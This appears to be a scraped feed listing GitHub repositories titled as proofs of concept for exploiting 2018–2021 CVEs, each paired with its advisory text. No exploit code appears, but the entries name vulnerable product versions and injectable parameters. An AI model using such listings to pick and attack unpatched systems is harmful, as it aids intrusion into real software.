PoC for exploiting CVE-2021-27046 : A Memory Corruption vulnerability for PDF files in Autodesk Navisworks 2019, 2020, 2021, 2022 may lead to code execution through maliciously crafted DLL files. : AIPOCAI/CVE-2021-27046 create time: 2021-10-05T11:08:06Z
PoC for exploiting CVE-2020-23659 : WebPort-v1.19.17121 is affected by Cross Site Scripting (XSS) on the "connections" feature. : AIPOCAI/CVE-2020-23659 create time: 2021-10-05T11:07:02Z
PoC for exploiting CVE-2020-21468 : ** DISPUTED ** A segmentation fault in the redis-server component of Redis 5.0.7 leads to a denial of service (DOS). NOTE: the vendor cannot reproduce this issue in a released version, such as 5.0.7. : AIPOCAI/CVE-2020-21468 create time: 2021-10-05T11:06:11Z
PoC for exploiting CVE-2021-27044 : A Out-Of-Bounds Read/Write Vulnerability in Autodesk FBX Review version 1.4.0 may lead to remote code execution through maliciously crafted DLL files or information disclosure. : AIPOCAI/CVE-2021-27044 create time: 2021-10-05T11:16:19Z
PoC for exploiting CVE-2021-39209 : GLPI is a free Asset and IT management software package. In versions prior to 9.5.6, a user who is logged in to GLPI can bypass Cross-Site Request Forgery (CSRF) protection in many places. This could allow a malicious actor to perform many actions on GLPI. This issue is fixed in version 9.5.6. There are no workarounds aside from upgrading. : AIPOCAI/CVE-2021-39209 create time: 2021-10-05T11:16:15Z
PoC for exploiting CVE-2021-38156 : In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard. : AIPOCAI/CVE-2021-38156 create time: 2021-10-05T11:16:11Z
PoC for exploiting CVE-2021-27340 : OpenSIS Community Edition version <= 7.6 is affected by a reflected XSS vulnerability in EmailCheck.php via the "opt" parameter. : AIPOCAI/CVE-2021-27340 create time: 2021-10-05T11:16:07Z
PoC for exploiting CVE-2021-27341 : OpenSIS Community Edition version <= 7.6 is affected by a local file inclusion vulnerability in DownloadWindow.php via the "filename" parameter. : AIPOCAI/CVE-2021-27341 create time: 2021-10-05T11:16:03Z
PoC for exploiting CVE-2021-3797 : hestiacp is vulnerable to Use of Wrong Operator in String Comparison : AIPOCAI/CVE-2021-3797 create time: 2021-10-05T11:15:59Z
PoC for exploiting CVE-2021-40066 : The access controls on the Mobility read-only API improperly validate user access permissions. Attackers with both network access to the API and valid credentials can read data from it; regardless of access control group membership settings. This vulnerability is fixed in Mobility v11.76 and Mobility v12.14. : AIPOCAI/CVE-2021-40066 create time: 2021-10-05T11:15:55Z
PoC for exploiting CVE-2021-40067 : The access controls on the Mobility read-write API improperly validate user access permissions; this API is disabled by default. If the API is manually enabled, attackers with both network access to the API and valid credentials can read and write data to it; regardless of access control group membership settings. This vulnerability is fixed in Mobility v12.14. : AIPOCAI/CVE-2021-40067 create time: 2021-10-05T11:15:51Z
PoC for exploiting CVE-2021-40157 : A user may be tricked into opening a malicious FBX file which may exploit an Untrusted Pointer Dereference vulnerability in FBX’s Review version 1.5.0 and prior causing it to run arbitrary code on the system. : AIPOCAI/CVE-2021-40157 create time: 2021-10-05T11:15:47Z
PoC for exploiting CVE-2021-34576 : In Kaden PICOFLUX Air in all known versions an information exposure through observable discrepancy exists. This may give sensitive information (water consumption without distinct values) to third parties. : AIPOCAI/CVE-2021-34576 create time: 2021-10-05T11:15:43Z
PoC for exploiting CVE-2021-29752 : IBM Db2 11.2 and 11.5 contains an information disclosure vulnerability, exposing remote storage credentials to privileged users under specific conditions. IBM X-Fporce ID: 201780. : AIPOCAI/CVE-2021-29752 create time: 2021-10-05T11:15:38Z
PoC for exploiting CVE-2021-29842 : IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0 and Liberty 17.0.0.3 through 21.0.0.9 could allow a remote user to enumerate usernames due to a difference of responses from valid and invalid login attempts. IBM X-Force ID: 205202. : AIPOCAI/CVE-2021-29842 create time: 2021-10-05T11:15:34Z
PoC for exploiting CVE-2021-3805 : object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') : AIPOCAI/CVE-2021-3805 create time: 2021-10-05T11:15:27Z
PoC for exploiting CVE-2021-39189 : Pimcore is an open source data & experience management platform. In versions prior to 10.1.3, it is possible to enumerate usernames via the forgot password functionality. This issue is fixed in version 10.1.3. As a workaround, one may apply the available patch manually. : AIPOCAI/CVE-2021-39189 create time: 2021-10-05T11:15:18Z
PoC for exploiting CVE-2021-41061 : In RIOT-OS 2021.01, nonce reuse in 802.15.4 encryption in the ieee820154_security component allows attackers to break encryption by triggering reboots. : AIPOCAI/CVE-2021-41061 create time: 2021-10-05T11:14:33Z
PoC for exploiting CVE-2021-40670 : SQL Injection vulnerability exists in Wuzhi CMS 4.1.0 via the keywords iparameter under the /coreframe/app/order/admin/card.php file. : AIPOCAI/CVE-2021-40670 create time: 2021-10-05T11:14:28Z
PoC for exploiting CVE-2021-40845 : The web part of Zenitel AlphaCom XE Audio Server through 11.2.3.10, called AlphaWeb XE, does not restrict file upload in the Custom Scripts section at php/index.php. Neither the content nor extension of the uploaded files is checked, allowing execution of PHP code under the /cmd directory. : AIPOCAI/CVE-2021-40845 create time: 2021-10-05T11:14:24Z
PoC for exploiting CVE-2021-38877 : IBM Jazz for Service Management 1.1.3.10 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208405. : AIPOCAI/CVE-2021-38877 create time: 2021-10-05T11:14:20Z
PoC for exploiting CVE-2021-29905 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 207616. : AIPOCAI/CVE-2021-29905 create time: 2021-10-05T11:14:17Z
PoC for exploiting CVE-2021-29904 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI displays user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 207610. : AIPOCAI/CVE-2021-29904 create time: 2021-10-05T11:14:12Z
PoC for exploiting CVE-2021-29833 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204825. : AIPOCAI/CVE-2021-29833 create time: 2021-10-05T11:14:08Z
PoC for exploiting CVE-2021-29832 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204824. : AIPOCAI/CVE-2021-29832 create time: 2021-10-05T11:13:58Z
PoC for exploiting CVE-2021-29816 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204341. : AIPOCAI/CVE-2021-29816 create time: 2021-10-05T11:13:54Z
PoC for exploiting CVE-2021-29815 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204340. : AIPOCAI/CVE-2021-29815 create time: 2021-10-05T11:13:50Z
PoC for exploiting CVE-2021-29814 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204334. : AIPOCAI/CVE-2021-29814 create time: 2021-10-05T11:13:45Z
PoC for exploiting CVE-2021-29813 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204331. : AIPOCAI/CVE-2021-29813 create time: 2021-10-05T11:13:41Z
PoC for exploiting CVE-2021-29812 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204330. : AIPOCAI/CVE-2021-29812 create time: 2021-10-05T11:13:37Z
PoC for exploiting CVE-2021-29810 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204279. : AIPOCAI/CVE-2021-29810 create time: 2021-10-05T11:13:33Z
PoC for exploiting CVE-2021-38176 : Due to improper input sanitization, an authenticated user with certain specific privileges can remotely call NZDT function modules listed in Solution Section to execute manipulated query to gain access to Backend Database. On successful exploitation the threat actor could completely compromise confidentiality, integrity, and availability of the system. : AIPOCAI/CVE-2021-38176 create time: 2021-10-05T11:13:24Z
PoC for exploiting CVE-2021-21798 : An exploitable return of stack variable address vulnerability exists in the JavaScript implementation of Nitro Pro PDF. A specially crafted document can cause a stack variable to go out of scope, resulting in the application dereferencing a stale pointer. This can lead to code execution under the context of the application. An attacker can convince a user to open a document to trigger the vulnerability. : AIPOCAI/CVE-2021-21798 create time: 2021-10-05T11:13:17Z
PoC for exploiting CVE-2018-16871 : A flaw was found in the Linux kernel's NFS implementation, all versions 3.x and all versions 4.x up to 4.20. An attacker, who is able to mount an exported NFS filesystem, is able to trigger a null pointer dereference by using an invalid NFS sequence. This can panic the machine and deny access to the NFS server. Any outstanding disk writes to the NFS server will be lost. : AlAIAL90/CVE-2018-16871 create time: 2021-10-05T10:20:48Z
PoC for exploiting CVE-2019-0205 : In Apache Thrift all versions up to and including 0.12.0, a server or client may run into an endless loop when feed with specific input data. Because the issue had already been partially fixed in version 0.11.0, depending on the installed version it affects only certain language bindings. : AlAIAL90/CVE-2019-0205 create time: 2021-10-05T10:19:24Z
PoC for exploiting CVE-2020-21913 : International Components for Unicode (ICU-20850) v66.1 was discovered to contain a use after free bug in the pkg_createWithAssemblyCode function in the file tools/pkgdata/pkgdata.cpp. : AlAIAL90/CVE-2020-21913 create time: 2021-10-05T10:21:31Z
PoC for exploiting CVE-2020-19144 : Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the 'in _TIFFmemcpy' funtion in the component 'tif_unix.c'. : AlAIAL90/CVE-2020-19144 create time: 2021-10-05T10:20:33Z
PoC for exploiting CVE-2020-19143 : Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the "TIFFVGetField" funtion in the component 'libtiff/tif_dir.c'. : AlAIAL90/CVE-2020-19143 create time: 2021-10-05T10:20:29Z
PoC for exploiting CVE-2021-35202 : NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Authorization Bypass (to access an endpoint) in FDSQueryService. : AlAIAL90/CVE-2021-35202 create time: 2021-10-05T10:21:43Z
PoC for exploiting CVE-2021-35203 : NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Arbitrary File Read operations via the FDSQueryService endpoint. : AlAIAL90/CVE-2021-35203 create time: 2021-10-05T10:21:39Z
PoC for exploiting CVE-2021-3626 : The Windows version of Multipass before 1.7.0 allowed any local process to connect to the localhost TCP control socket to perform mounts from the operating system to a guest, allowing for privilege escalation. : AlAIAL90/CVE-2021-3626 create time: 2021-10-05T10:21:35Z
PoC for exploiting CVE-2021-3747 : The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner. : AlAIAL90/CVE-2021-3747 create time: 2021-10-05T10:21:27Z
PoC for exploiting CVE-2021-34352 : A command injection vulnerability has been reported to affect QNAP device running QVR. If exploited, this vulnerability could allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR 5.1.5 build 20210902 and later : AlAIAL90/CVE-2021-34352 create time: 2021-10-05T10:21:24Z
PoC for exploiting CVE-2021-41082 : Discourse is a platform for community discussion. In affected versions any private message that includes a group had its title and participating user exposed to users that do not have access to the private messages. However, access control for the private messages was not compromised as users were not able to view the posts in the leaked private message despite seeing it in their inbox. The problematic commit was reverted around 32 minutes after it was made. Users are encouraged to upgrade to the latest commit if they are running Discourse against the tests-passed branch. : AlAIAL90/CVE-2021-41082 create time: 2021-10-05T10:21:20Z
PoC for exploiting CVE-2021-23054 : On version 16.x before 16.1.0, 15.1.x before 15.1.4, 14.1.x before 14.1.4.4, and all versions of 13.1.x, 12.1.x, and 11.6.x, a reflected cross-site scripting (XSS) vulnerability exists in the resource information page for authenticated users when a full webtop is configured on the BIG-IP APM system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. : AlAIAL90/CVE-2021-23054 create time: 2021-10-05T10:21:16Z
PoC for exploiting CVE-2021-38402 : Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could lead to a stack-based buffer overflow while trying to copy to a buffer during font string handling. An attacker could leverage this vulnerability to execute code in the context of the current process. : AlAIAL90/CVE-2021-38402 create time: 2021-10-05T10:21:12Z
PoC for exploiting CVE-2021-38404 : Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in a heap-based buffer overflow. An attacker could leverage this vulnerability to execute code in the context of the current process. : AlAIAL90/CVE-2021-38404 create time: 2021-10-05T10:21:09Z
PoC for exploiting CVE-2021-38406 : Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process. : AlAIAL90/CVE-2021-38406 create time: 2021-10-05T10:21:05Z
PoC for exploiting CVE-2021-1810 : A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. : AlAIAL90/CVE-2021-1810 create time: 2021-10-05T10:21:00Z
PoC for exploiting CVE-2021-41381 : Payara Micro Community 5.2021.6 and below allows Directory Traversal. : [AlAIAL90/CVE-2021-41381](https://github.com
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent